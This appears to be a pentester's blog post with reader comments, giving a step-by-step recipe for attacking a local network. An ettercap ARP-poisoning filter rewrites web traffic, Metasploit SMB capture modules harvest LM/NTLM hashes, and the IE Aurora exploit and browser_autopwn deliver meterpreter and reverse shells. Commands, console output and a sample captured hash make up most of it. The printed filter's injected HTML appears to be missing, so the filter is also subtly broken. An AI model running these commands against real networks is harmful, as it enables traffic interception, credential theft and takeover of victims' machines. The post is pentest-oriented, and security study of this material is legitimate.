Ettercap + Metasploit – Helping the Aurora Attack


I found a nice trick from Fulfor based in another trick from Iron Geek that I applied in a Pentest using the magical HD Moore’s Metasploit and his browser_autopwn module and now I am adding the Aurora IE new Metasploit module.

This trick has 3 parts:

The Ettercap Filter

Based on the Irongeek’s Fun with Ettercap Filters and Bob’s Fulfor article I am creating the next ettercap filter:

 # Just copy and paste in you terminal.
cat > ch0ks.browser_autopwn.attack.filter << __END
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-gnidocnE"); 
	  # note: replacement string is same length as original string
      msg("Encoding Taken Care Of...\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("head>", "head>  ");
replace("body>", "body>  ");
msg("Replacement Filter Ran.\n");
}

__END

The IP string 192.168.123.3:80 is the IP with the port where I have the browser_autopwn module wating for the connection and I am using the head and body tag because I want my attack to be the first thing they load. Now we compile the code:

etterfilter -o ch0ks.browser_autopwn.attack.ef ch0ks.browser_autopwn.attack.filter

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


 12 protocol tables loaded:
	DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 

 11 constants loaded:
	VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP 

 Parsing source file 'ch0ks.browser_autopwn.attack.filter'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'ch0ks.browser_autopwn.attack.ef'  done.

 -> Script encoded into 16 instructions.

Now we start the ettercap making the ARP Poisoning attack and injecting the HTML code:

ettercap -P smb_down -i eth0 -l logfile-`date +%F-%s` -m msgfile-`date +%F-%s` -T  -M arp:remote -F ch0ks.browser_autopwn.attack.ef  /192.168.123.39,42,33,106,154/ /192.168.123.1/

The commands is running ettercap with the smb_down plugin that forces the connection to be a LM authentication, so it searches for the \\192.168.5.45\share\pixel.gif file that will be waiting the metasploit auxiliary/server/capture/smb module and will be logging the hashes. Also the Ettercap will be logging everything in the logfile and msgfile and making an ARP Poisoning between the first IPs in // and the second, I really recommend to use a little number of IPs and the Gateway to avoid making a DoS on the network. The -F is the parameter will load our brand new filter that will inject on the fly HTML code in the traffic between the victims, that’s why is important to use the gateway.

No we have to start our Metasploit attack. This is not new, I took the idea from Bob’s Fulfor article. I just gonna update it to work with the Metasploit Framework 3 and add it the browser_autopwn or the aurora attack.

In the moment I am writting this article I am using the metasploit v3.3.4-dev [core:3.3 api:1.0].

 
#    # ###### #####   ##    ####  #####  #       ####  # ##### 
##  ## #        #    #  #  #      #    # #      #    # #   #   
# ## # #####    #   #    #  ####  #    # #      #    # #   #   
#    # #        #   ######      # #####  #      #    # #   #   
#    # #        #   #    # #    # #      #      #    # #   #   
#    # ######   #   #    #  ####  #      ######  ####  #   #   



       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 324 exploits - 105 auxiliary
+ -- --=[ 217 payloads - 20 encoders - 6 nops
       =[ svn r8286 updated today (2010.01.28)

msf > 

For the next modules you need to work with the root account because you need to open priviledges ports like 80, 135 and 445 for the attack to work. I am using Ubuntu Linux Karmic Koala, but you can use the Backtrack Project for this attack.

NTLM or LM Interception.

We start the attack.

sudo msfconsole 
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set  LOGFILE Metasploit139.log
LOGFILE => Metasploit139.log
msf auxiliary(smb) > set  PWFILE Metasploit139.pwd 
PWFILE => Metasploit139.pwd
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.

msf auxiliary(smb) > set  LOGFILE Metasploit445.log            
LOGFILE => Metasploit445.log
msf auxiliary(smb) > set  PWFILE Metasploit445.pwd 
PWFILE => Metasploit445.pwd
msf auxiliary(smb) > set SRVPORT 445 
SRVPORT => 445
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) > 

I am running the service on both 139 and 445 because in my experience it improves the chances to catch an authentication hash. Now we have to wait and with some luck you sould see something like:

[*] Received 192.168.0.103:2281 MYDOMAIN\LAMEUSER LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

This is good but you can’t just use that hash to authenticate so you have to crack it using the idea from carnal0wnage’s blog article: Using the Metasploit SMB Sniffer Module NOTE: The tool halflm_second.rb is in the tools directory inside the Metsploit directory.

Attacking the Browser directly

Now we have to start the browser_autopwn

msf auxiliary(smb) > use windows/browser/ie_aurora     
msf exploit(ie_aurora) > set SRVPORT 80   
SRVPORT => 80
msf exploit(ie_aurora) > set URIPATH /    
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp 
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > show options 

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ie_aurora) > exploit 
[*] Exploit running as background job.
msf exploit(ie_aurora) > 
[*] Started bind handler
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.123.3:80/
[*] Server started.

That’s it now you have to wait so a browser bite the bait and get a meterpreter console. This was about the Aurora new Metasploit’s module because is the new trend of the night but let’s face it, it is just part of the big world of the browser attacks. So if you are just lazy you can use the browser_autopwn module:

msf auxiliary(browser_autopwn) > db_driver  sqlite3                
[*] Using database driver sqlite3
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.123.3
LHOST => 192.168.123.3
msf auxiliary(browser_autopwn) > set SRVPORT 80  
SRVPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > show options  

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.123.3    yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Starting exploit modules on host 192.168.123.3...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/IC0F7kIlYh
[*]  Local IP: http://192.168.123.3:80/IC0F7kIlYh
[*] Server started.
...
[*] Starting the payload handler...
[*] Started reverse handler on port 6666
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.123.3:80/
[*] Server started.

That’s it now you have to wait so a browser bite the bait and get a shell inside the computer with the user priviledges that is running the browser.

Happy Pentesting

Adrián Puente Z.

Technorati Tags:
; ; ; ; ; ; ; ; ; ; ; ; ; ; Tag generator

Share

About ch0ks

Untamable cybersecurity enthusiast focused on DevOps and automatization. Former Pentester, CTFer, Linux fanboy, full time nerd and compulsive SciFy reader.
This entry was posted in Articles, Hacking, Security and tagged , , , , , , , , , , . Bookmark the permalink.

6 Responses to Ettercap + Metasploit – Helping the Aurora Attack

  1. Pingback: Tweets that mention H4CKarandas » Blog Archive » Ettercap + Metasploit – Helping the Aurora Attack -- Topsy.com

  2. h31180y says:

    that attack browser_autopwn, i’ve been implementing in Rogue AP attack.
    In your article is still useful to me, because i can implement in aurora
    attack. in your explanation of ettercap and browser_autopwn you make a good interaction with that
    When you perform the MITM, i can use aurora exploit and attack all the IE v6 victims inject meterpreter’s payload.
    in other version 7 and 8 only crash.

  3. DjMasta says:

    I really like when people are expressing their opinion and thought. So I like the way you are writing

  4. WP Themes says:

    Genial dispatch and this post helped me alot in my college assignement. Thanks you on your information.

  5. hushdevil says:

    Your blog keeps getting better and better! Your older articles are not as good as newer ones you have a lot more creativity and originality now. Keep it up!
    And according to this article, I totally agree with your opinion, but only this time! :)

  6. Pingback: Sergio Proxy – Injecting, Modifying, and Blocking HTTP Traffic « Spare Clock Cycles

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.